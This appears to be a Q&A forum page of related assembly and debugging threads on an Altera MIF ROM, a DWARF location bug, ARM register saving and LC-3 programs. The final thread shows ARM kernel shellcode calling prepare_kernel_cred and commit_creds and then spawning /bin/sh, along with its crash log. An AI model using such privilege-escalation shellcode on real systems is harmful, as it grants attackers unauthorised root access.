I am working on single cycle risc processor. I am using altera LPM wizard ROM 1 port for instruction memory. The ROM is initialized by mif file. The content of the file is given below
WIDTH=16;
DEPTH=256;
ADDRESS_RADIX=HEX;
DATA_RADIX=HEX;
CONTENT BEGIN
-- default value
[00..FF] : 00;
-- instructions
00 : 2401; -- ADI R1, R0, x01
01 : 2802; -- ADI R2, R0, x02
02 : 2C03; -- ADI R3, R0, x03
03 : 3011; -- ADI R4, R0, x11
04 : 1648; -- ADD R5, R4, R4
05 : 1AC8; -- ADD R6, R5, R4
06 : C0C1; -- ST R1, R4
07 : C151; -- ST R2, R5
08 : C1E1; -- ST R3, R6
09 : 80FF; -- BZ R0, -1
END;
After I complete the initialization process the contents of mif file automatically changes to
-- Clearbox generated Memory Initialization File (.mif)
WIDTH=16;
DEPTH=256;
ADDRESS_RADIX=HEX;
DATA_RADIX=HEX;
CONTENT BEGIN
000 : FFF0;
001 : FFF1;
002 : FFF2;
003 : FFF3;
004 : FFF4;
005 : FFF5;
-------------
-------------
0fd : FFFD;
0fe : FFFE;
0ff : FFFF;
END;
I have no idea what is happening so please help..I am just learning VHDL programming
This is not a VHDL problem! But IMO, VHDL gives you a better answer. Replace this "LPM Wizard ROM" with a plain VHDL constant array, initialised (in VHDL) to the values you want.
package InstMem is
type Instruction is std_logic_vector(15 downto 0);
type ProgMem_Array is array 0 to 255 of Instruction;
constant Progmem : Progmem_Array := (
00 => 16#2401#, -- ADI R1, R0, x01
01 => 16#2802#, -- ADI R2, R0, x02
02 => 16#2C03#, -- ADI R3, R0, x03
others => (others => 0) );
end package InstMem;
Persuading your assembler or a Python script to write this VHDL package is trivial...
Related
I have a C program in file delay.c:
void delay(int num)
{
volatile int i;
for(i=0; i<num; i++);
}
Then I compile the program with gcc 4.6.3 on ARM emulator (armel, more specifically) with command gcc -g -O1 -o delay.o delay.c. The assembly in delay.o is:
00000000 <delay>:
0: e24dd008 sub sp, sp, #8
4: e3a03000 mov r3, #0
8: e58d3004 str r3, [sp, #4]
c: e59d3004 ldr r3, [sp, #4]
10: e1500003 cmp r0, r3
14: da000005 ble 30 <delay+0x30>
18: e59d3004 ldr r3, [sp, #4]
1c: e2833001 add r3, r3, #1
20: e58d3004 str r3, [sp, #4]
24: e59d3004 ldr r3, [sp, #4]
28: e1530000 cmp r3, r0
2c: bafffff9 blt 18 <delay+0x18>
30: e28dd008 add sp, sp, #8
34: e12fff1e bx lr
I want to figure out where the variable i is on the stack of function delay from debugging information. Below is the information about delay and i in .debug_info section:
<1><25>: Abbrev Number: 2 (DW_TAG_subprogram)
<26> DW_AT_external : 1
<27> DW_AT_name : (indirect string, offset: 0x19): delay
<2b> DW_AT_decl_file : 1
<2c> DW_AT_decl_line : 1
<2d> DW_AT_prototyped : 1
<2e> DW_AT_low_pc : 0x0
<32> DW_AT_high_pc : 0x38
<36> DW_AT_frame_base : 0x0 (location list)
<3a> DW_AT_sibling : <0x59>
...
<2><4b>: Abbrev Number: 4 (DW_TAG_variable)
<4c> DW_AT_name : i
<4e> DW_AT_decl_file : 1
<4f> DW_AT_decl_line : 3
<50> DW_AT_type : <0x60>
<54> DW_AT_location : 0x20 (location list)
It shows that the location of i is in the location list. So I output the location list:
Offset Begin End Expression
00000000 00000000 00000004 (DW_OP_breg13 (r13): 0)
00000000 00000004 00000038 (DW_OP_breg13 (r13): 8)
00000000 <End of list>
00000020 0000000c 00000020 (DW_OP_fbreg: -12)
00000020 00000024 00000028 (DW_OP_reg3 (r3))
00000020 00000028 00000038 (DW_OP_fbreg: -12)
00000020 <End of list>
From address 4 to 38, the frame base of delay should be r13 + 8. So from address c to 20 and from address 28 to 38, the location of i is r13 + 8 -12 = r13 - 4.
However, from the assembly, we can know that there is no location r13 - 4 and i is apparently at location r13 + 4.
Do I miss some calculation step? Anyone can explain the difference of i's location between calculation from debugging information and in assembly?
Thanks in advance!
TL;DR The analysis in the question is correct and the discrepancy is a bug in one of the gcc components (GNU Arm Embedded Toolchain is an obvious place to log one).
As it stands, this other answer is incorrect because it erroneously conflates the value of the stack pointer on evaluation of a location expression with the earlier value of the stack pointer on entry to the function.
As far as the DWARF is concerned, the location of i varies with the program counter. Consider, for example, the text address delay+0x18. At this point, the location of i is given by DW_OP_fbreg(-12), i.e. 12 bytes below the frame base. The frame base is given by the parent DW_TAG_subprogram's DW_AT_frame_base attribute which, in this case, is also dependent on the program counter: for delay+0x18 its expression is DW_OP_breg13(8), i.e. r13 + 8. Importantly, this calculation uses the current value of r13, i.e. the value of r13 when the program counter is equal to delay+0x18.
Thus the DWARF asserts that, at delay+0x18, i is located at r13 + 8 - 12, i.e. 4 bytes below the bottom of the existing stack. Inspection of the assembly shows that, at delay+018, i should be found 4 bytes above the bottom of the stack. Therefore the DWARF is in error and whatever generated it is defective.
One can demonstrate the bug using gdb with a simple wrapper around the test case provided in the question:
$ cat delay.c
void delay(int num)
{
volatile int i;
for(i=0; i<num; i++);
}
$ gcc-4.6 -g -O1 -c delay.c
$ cat main.c
void delay(int);
int main(int argc, char **argv) {
delay(3);
}
$ gcc-4.6 -o test main.c delay.o
$ gdb ./test
.
.
.
(gdb)
Set a breakpoint at delay+0x18 and run to the second occurrence (where we expect i to be 1):
(gdb) break *delay+0x18
Breakpoint 1 at 0x103cc: file delay.c, line 4.
(gdb) run
Starting program: /home/pi/test
Breakpoint 1, 0x000103cc in delay (num=3) at delay.c:4
4 for(i=0; i<num; i++);
(gdb) cont
Continuing.
Breakpoint 1, 0x000103cc in delay (num=3) at delay.c:4
4 for(i=0; i<num; i++);
(gdb)
We know from the disassembly that i is four bytes above the stack pointer. Indeed, there it is:
(gdb) print *((int *)($r13 + 4))
$1 = 1
(gdb)
However, the bogus DWARF means that gdb looks in the wrong place:
(gdb) print i
$2 = 0
(gdb)
As explained above, the DWARF is incorrectly giving the location of i at four bytes below the stack pointer. There's a zero there, hence the reported value of i:
(gdb) print *((int *)($r13 - 4))
$3 = 0
(gdb)
This isn't a coincidence. A magic number written into this bogus location below the stack pointer reappears when gdb is asked to print i:
(gdb) set *((int *)($r13 - 4)) = 42
(gdb) print i
$6 = 42
(gdb)
Thus, at delay+0x18, the DWARF incorrectly encodes the location of i as r13 - 4 even though its true location is r13 + 4.
One can go a step further by editing the compilation unit by hand and replacing DW_OP_fbreg(-12) (bytes 0x91 0x74) with DW_OP_fbreg(-4) (bytes 0x91 0x7c). This gives
$ readelf --debug-dump=loc delay.modified.o
Contents of the .debug_loc section:
Offset Begin End Expression
00000000 00000000 00000004 (DW_OP_breg13 (r13): 0)
0000000c 00000004 00000038 (DW_OP_breg13 (r13): 8)
00000018 <End of list>
00000020 0000000c 00000020 (DW_OP_fbreg: -4)
0000002c 00000024 00000028 (DW_OP_reg3 (r3))
00000037 00000028 00000038 (DW_OP_fbreg: -4)
00000043 <End of list>
$
In other words, the DWARF has been corrected so that at, e.g., delay+0x18 the location of i is given as frame base - 4 = r13 + 8 - 4 = r13 + 4, matching the assembly. Repeating the gdb experiment with the corrected DWARF shows the expected value of i each time around the loop:
$ gcc-4.6 -o test.modified main.c delay.modified.o
$ gdb ./test.modified
.
.
.
(gdb) break *delay+0x18
Breakpoint 1 at 0x103cc: file delay.c, line 4.
(gdb) run
Starting program: /home/pi/test.modified
Breakpoint 1, 0x000103cc in delay (num=3) at delay.c:4
4 for(i=0; i<num; i++);
(gdb) print i
$1 = 0
(gdb) cont
Continuing.
Breakpoint 1, 0x000103cc in delay (num=3) at delay.c:4
4 for(i=0; i<num; i++);
(gdb) print i
$2 = 1
(gdb) cont
Continuing.
Breakpoint 1, 0x000103cc in delay (num=3) at delay.c:4
4 for(i=0; i<num; i++);
(gdb) print i
$3 = 2
(gdb) cont
Continuing.
[Inferior 1 (process 30954) exited with code 03]
(gdb)
I am not agree with the OP's asm analysis:
00000000 <delay>: ; so far, let's suppose sp = sp(0)
0: e24dd008 sub sp, sp, #8 ; sp = sp(0) - 8
4: e3a03000 mov r3, #0 ; r3 = 0
8: e58d3004 str r3, [sp, #4] ; store the value of r3 in (sp + 4)
c: e59d3004 ldr r3, [sp, #4] ; load (sp + 4) in r3
10: e1500003 cmp r0, r3 ; compare r3 and r0
14: da000005 ble 30 <delay+0x30> ; go to end of loop
18: e59d3004 ldr r3, [sp, #4] ; i is in r3, and it is being loaded from
; (sp + 4), that is,
; sp(i) = sp(0) - 8 + 4 = sp(0) - 4
1c: e2833001 add r3, r3, #1 ; r3 = r3 + 1, that is, increment i
20: e58d3004 str r3, [sp, #4] ; store i (which is in r3) in (sp + 4),
; being again sp(i) = sp(0) - 8 + 4 = \
; sp(0) - 4
24: e59d3004 ldr r3, [sp, #4] ; load sp + 4 in r3
28: e1530000 cmp r3, r0 ; compare r3 and r0
2c: bafffff9 blt 18 <delay+0x18> ; go to init of loop
30: e28dd008 add sp, sp, #8 ; sp = sp + 8
34: e12fff1e bx lr ;
So i is located in sp(0) - 4, which matchs with the dwarf analysis (which says that i is being located in 0 + 8 - 12)
Edit in order to add information regarding my DWARF analysis:
According to this line: 00000020 0000000c 00000020 (DW_OP_fbreg: -12) , being DW_OP_fbreg :
The DW_OP_fbreg operation provides a signed LEB128 offset from
the address specified by
the location description in the DW_AT_frame_base attribute of the
current function. (This is
typically a “stack pointer” register plus or minus some offset.
On more sophisticated systems
it might be a location list that adjusts the offset according to
changes in the stack pointer as
the PC changes.)
,the address is frame_base + offset, where:
frame_base : is the stack pointer +/- some offset, and according to the previous line (00000000 00000004 00000038 (DW_OP_breg13 (r13): 8)), from 00000004 to 00000038, it has an offset of +8 (r13 is SP)
offset: obviously it is -12
Given that, DWARF indicates that it is pointing to sp(0) + 8 - 12 = sp(0) - 4
Consider the following code:
extern unsigned int foo(char c, char **p, unsigned int *n);
unsigned int test(const char *s, char **p, unsigned int *n)
{
unsigned int done = 0;
while (*s)
done += foo(*s++, p, n);
return done;
}
Output in Assembly:
00000000 <test>:
0: b5f8 push {r3, r4, r5, r6, r7, lr}
2: 0005 movs r5, r0
4: 000e movs r6, r1
6: 0017 movs r7, r2
8: 2400 movs r4, #0
a: 7828 ldrb r0, [r5, #0]
c: 2800 cmp r0, #0
e: d101 bne.n 14 <test+0x14>
10: 0020 movs r0, r4
12: bdf8 pop {r3, r4, r5, r6, r7, pc}
14: 003a movs r2, r7
16: 0031 movs r1, r6
18: f7ff fffe bl 0 <foo>
1c: 3501 adds r5, #1
1e: 1824 adds r4, r4, r0
20: e7f3 b.n a <test+0xa>
C code compiled using arm-none-eabi-gcc versions: 4.9.1, 5.4.0, 6.3.0 and 7.1.0 on
Linux host. Assembly output is the same for all GCC versions.
CFLAGS := -Os -march=armv6-m -mcpu=cortex-m0plus -mthumb
My understanding of the execution flow is following:
Push R3-R7 + LR onto the stack (totally unclear)
Move R0 to R5 (this is clear)
Move R1 to R6 and R2 to R7 (totally unclear)
Dereference R5 into R0 (This is clear)
Compare R0 with 0 (This is clear)
If R0 != 0 go to line 14: - Restore R1 from R6 and R2 from R7 and call foo(),
If R0 == 0 stay at line 10, restore R3 - R7 + PC from stack (totally unclear)
Increment R5 (clear)
accumulate result from foo() (clear)
Branch back to line a: (clear)
My own Assembly. Not extensively tested, but definitely I would not need more than R4 + LR to be pushed onto the stack:
EDIT: According to the provided answers, my example from below will fail due to R1 and R2 not being persistent through call to foo()
51 unsigned int __attribute__((naked)) test_asm(const char *s, char **p, unsigned int *n)
52 {
53 // r0 - *s (move ptr to r3 and dereference it to r0)
54 // r1 - **p
55 // r2 - *n
56 asm volatile(
57 " push {r4, lr} \n\t"
58 " movs r4, #0 \n\t"
59 " movs r3, r0 \n\t"
60 "1: \n\t"
61 " ldrb r0, [r3, #0] \n\t"
62 " cmp r0, #0 \n\t"
63 " beq 2f \n\t"
64 " bl foo \n\t"
65 " add r4, r4, r0 \n\t"
66 " add r3, #1 \n\t"
67 " b 1b \n\t"
68 "2: \n\t"
69 " movs r0, r4 \n\t"
70 " pop {r4, pc} \n\t"
71 );
72 }
Questions:
Why GCC stores so many registers for such trivial function?
Why it pushes R3 while it is written in ABI that R0-R3 are argument registers
and supposed to be a caller save and should be safely used inside called function
in this case test()
Why it copy R1 to R6 and R2 to R7 while the prototype of extern function almost
ideally matches the test() function. So R1 and R2 are already ready to be passed
to foo() routine. My understanding is that only R0 need to be dereferenced before
call to foo()
LR must be saved since test is not a leaf function. r5-r7 are used by the function to store values that are used across function calls and since they are not scratch they must be saved. r3 is pushed to align the stack.
Adding an extra register to push is a fast and compact way to align the stack.
r1 and r2 may be trashed by the call to foo and since the values initially stored in these registers are needed after the call they must be stored in a location that survive calls.
I'm trying to count the number of characters in LC3 simulator and keep getting "a trap was executed with an illegal vector number".
These are the objects I execute
charcount.obj:
0011000000000000
0101010010100000
0010011000010000
1111000000100011
0110001011000000
0001100001111100
0000010000001000
1001001001111111
0001001001100001
0001001001000000
0000101000000001
0001010010100001
0001011011100001
0110001011000000
0000111111110110
0010000000000100
0001000000000010
1111000000100001
1111000000100101
1110001011111111
0000000000110000
and verse:
.ORIG x3100
.STRINGZ "Simple Simon met a pieman,"
.STRINGZ "Going to the fair;"
.STRINGZ "Says Simple Simon to the pieman,"
.STRINGZ "Let me taste your ware."
.FILL x04
.END
Looks like we're going to need more information before we can help you much. I understand you've provided us with some binary and I ran that through the LC3 simulator. Here's where I'm a bit lost, which string would you like to count and where is it stored?
After trying to piece together what you've provided here's what I've found.
Registers:
R0 x0061 97
R1 x0000 0
R2 x0000 0
R3 xE2FF -7425
R4 x0000 0
R5 x0000 0
R6 x0000 0
R7 x3003 12291
PC x3004 12292
IR x62C0 25280
CC Z
Memory:
x3000 0101010010100000 x54A0 AND R2, R2, #0
x3001 0010011000010000 x2610 LD R3, x3012
x3002 1111000000100011 xF023 TRAP IN
x3003 0110001011000000 x62C0 LDR R1, R3, #0
x3004 0001100001111100 x187C ADD R4, R1, #-4
x3005 0000010000001000 x0408 BRZ x300E
x3006 1001001001111111 x927F NOT R1, R1
x3007 0001001001100001 x1261 ADD R1, R1, #1
x3008 0001001001000000 x1240 ADD R1, R1, R0
x3009 0000101000000001 x0A01 BRNP x300B
x300A 0001010010100001 x14A1 ADD R2, R2, #1
x300B 0001011011100001 x16E1 ADD R3, R3, #1
x300C 0110001011000000 x62C0 LDR R1, R3, #0
x300D 0000111111110110 x0FF6 BRNZP x3004
x300E 0010000000000100 x2004 LD R0, x3013
x300F 0001000000000010 x1002 ADD R0, R0, R2
x3010 1111000000100001 xF021 TRAP OUT
x3011 1111000000100101 xF025 TRAP HALT
x3012 1110001011111111 xE2FF LEA R1, x3112
x3013 0000000000110000 x0030 NOP
The values displayed in the registers is what I get when I stop after line x3003. For some reason the literal value of xE2FF gets loaded into register R3. After that the value of 0 at memory location xE2FF is loaded into register R1 and then the problems mount from there.
I would recommend displaying your asm code and then commenting each line so we can better understand what you're trying to accomplish.
I'm attempting to write a short LC-3 program that initializes R1=5, R2=16 and computes the sum of R1 and R2 and put the result in memory x4000. The program is supposed to start at x3000. Unfortunately, I have to write it in binary form.
This is what I have so far...
.orig x3000__________; Program starts at x3000
0101 001 001 1 00000 ;R1 <- R1 AND x0000
0001 001 001 1 00101 ;R1 <- R1 + x0005
0101 010 010 1 00000 ;R2 <- R2 AND x0000
0001 010 010 1 01000 ;R2 <- R2 + x0008
0001 010 010 1 01000 ;R2 <- R2 + x0008
0001 011 010 0 00 001 ;R3 <- R2 + R1
//This last step is where I'm struggling...
I was thinking of using ST, and I figured PCOFFSET9 to be 994, but I can't represent that using 8 bits... so how else would I do this? Is my code inefficient?
0011 011
The ST command is limited to only 511 (I believe) from its current location in memory. For something like this you will need to use the STI command (Store Indirect) The sample code below will help explain how to use STI.
.orig x3000
AND R1, R1, #0 ; Clear R1
ADD R1, R1, #5 ; Store 5 into R1
AND R2, R2, #0 ; Clear R2
ADD R2, R2, #8 ; Store 8 into R2
ADD R3, R2, R1 ; R3 = R2 + R1
STI R3, STORE_x4000 ; Store the value of R3 into mem[x4000]
HALT ; TRAP x25 end the program
; Variables
STORE_x4000 .FILL x4000
.END
You will need to make the appropriate conversions to binary, but if you plug the code into the LC-3 simulator it will give you the binary representation.
My assembly code is
00000000 <_start>:
0: e28f6001 add r6, pc, #1
4: e12fff16 bx r6
8: 1b24 subs r4, r4, r4
a: 1c20 adds r0, r4, #0
c: 4a01 ldr r2, [pc, #4] ; (14 <_start+0x14>)
e: 4790 blx r2
10: 4a01 ldr r2, [pc, #4] ; (18 <_start+0x18>)
12: 4790 blx r2
14: 80047dbc .word 0x8003f924 ; prepare_kernel_cred
18: 80047a0c .word 0x8003f56c ; commit_creds
When I execute this assembly code, segment fault is occured and error message is
1010201d : 4a
1010201e : 90
1010201f : 47
10102020 : 1
10102021 : 4a
10102022 : 90
10102023 : 47
10102024 : 24
10102025 : f9
10102026 : 3
10102027 : 80
10102028 : 6c
10102029 : f5
1010202a : 3
1010202b : 80
Unable to handle kernel NULL pointer dereference at virtual address 00000000
pgd = 82d44000
[00000000] *pgd=63b28831, *pte=00000000, *ppte=00000000
Internal error: Oops: 17 [#16] SMP ARM
Modules linked in: m(PO)
CPU: 0 PID: 660 Comm: test Tainted: P D W O 3.11.4 #13
task: 86834b40 ti: 8686c000 task.ti: 8686c000
PC is at 0x10102024
LR is at commit_creds+0x78/0x210
pc : [<10102024>] lr : [<8003f5e4>] psr: 20000033
sp : 8686dfa8 ip : 00000000 fp : 00000000
r10: 00000000 r9 : 8686c000 r8 : 8000e348
r7 : 00000000 r6 : 10102019 r5 : 0000001c r4 : 00000000
r3 : 00000001 r2 : 00000000 r1 : 00000001 r0 : 00000000
Flags: nzCv IRQs on FIQs on Mode SVC_32 ISA Thumb Segment user
Control: 10c53c7d Table: 62d4406a DAC: 00000015
Process test (pid: 660, stack limit = 0x8686c238)
Stack: (0x8686dfa8 to 0x8686e000)
dfa0: 00000000 0000001c 00000001 00000000 0000001c ffffffff
dfc0: 00000000 0000001c 00000000 00000000 00000000 00000000 76fb0000 00000000
dfe0: 7ec0dd00 7ec0dcf0 00008643 76f3b8f0 20000010 00000001 00000000 00000000
[<8003f5e4>] (commit_creds+0x78/0x210) from [<0000001c>] (0x1c)
Code: 4a01 4790 4a01 4790 (f924) 8003
---[ end trace 1b1bf4ebadf07b63 ]---
Segmentation fault
I think PC is 0x10102024 means that 14: 8003f924 .word 0x80047dbc because machine code at 0x1010204 is \x24\xf9\x03\80.
However I don't understand Unable to handle kernel NULL pointer dereference at virtual address 00000000 means.
PC is 0x10102024 but kernel NULL pointer dereference is happened WHY?
00000000 <_start>:
0: e28f6001 add r6, pc, #1
4: e12fff16 bx r6
8: 1b24 subs r4, r4, r4
a: 1c20 adds r0, r4, #0
c: 4a0a ldr r2, [pc, #40] ; (38 <shellcode+0x22>)
e: 4790 blx r2
10: 4a0a ldr r2, [pc, #40] ; (3c <shellcode+0x26>)
12: 4790 blx r2
14: e7ff b.n 16 <shellcode>
00000016 <shellcode>:
16: 0000 movs r0, r0
18: e28f6001 add r6, pc, #1
1c: e12fff16 bx r6
20: 4678 mov r0, pc
22: 300a adds r0, #10
24: 9001 str r0, [sp, #4]
26: a901 add r1, sp, #4
28: 1a92 subs r2, r2, r2
2a: 270b movs r7, #11
2c: df01 svc 1
2e: 2f2f .short 0x2f2f
30: 2f6e6962 .word 0x2f6e6962
34: 00006873 .word 0x00006873
38: 80047dbc .word 0x80047dbc
3c: 80047a0c .word 0x80047a0c
In situations where you manage to get outside normal program flow and start executing random junk out of memory, it's always useful to have an idea of what the processor thinks is going on - if that last blx returns, you end up executing the data. What does that look like? Well, 'disassembling' arbitrary raw binaries is fun:
$ echo '24 f9 03 80' | xxd -r -p - hexfile
$ arm-linux-gnueabihf-objdump -bbinary -marm -D -Mforce-thumb hexfile
hexfile: file format binary
Disassembly of section .data:
00000000 <.data>:
0: f924 8003 vld4.8 {d8-d11}, [r4], r3
Well, how about that. By sheer coincidence, executing that address as a Thumb instruction results in a load using a base register which happens to be null at the time, hence the page fault.